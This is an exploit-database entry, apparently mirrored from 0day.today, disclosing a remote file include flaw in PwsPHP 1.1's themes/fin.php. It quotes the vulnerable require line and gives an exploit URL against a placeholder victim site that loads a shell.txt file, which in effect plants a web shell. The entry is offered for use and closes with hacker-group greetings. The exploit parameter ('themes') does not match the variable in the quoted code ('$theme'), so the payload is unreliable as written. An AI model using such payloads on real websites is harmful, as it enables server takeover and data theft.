id: 1097
date: 10/31/2006
title: PwsPHP <= 1.1 (themes/fin.php) Remote File Include Vulnerablity
author: 3l3ctric-Cracker
cves: 

===============================================================
PwsPHP <= 1.1 (themes/fin.php) Remote File Include Vulnerablity
===============================================================



=============================================================
PwsPHP v1.1 (theme) File inclusion Vulnerablity
===============================================
Script:PwsPHP
=============
Version:1.1
=============
script site:http://www.pwsphp.com
=================================
Author:Dr Max Virus
=======================================
Bug in;
themes/fin.php
==============
Vul Code:
require ("$theme/fin.php")
==========================
Exploit:
www.victim.com/script_path/themes/fin.php?themes=shell.txt?
===========================================================
Gr33Ts:str0ke-the master-Thehacker-NETTOXIC-ShiKAa-xoron-0xygen-All Ayyildiz
Team-All My Friends



#  0day.today [2023-03-22]  #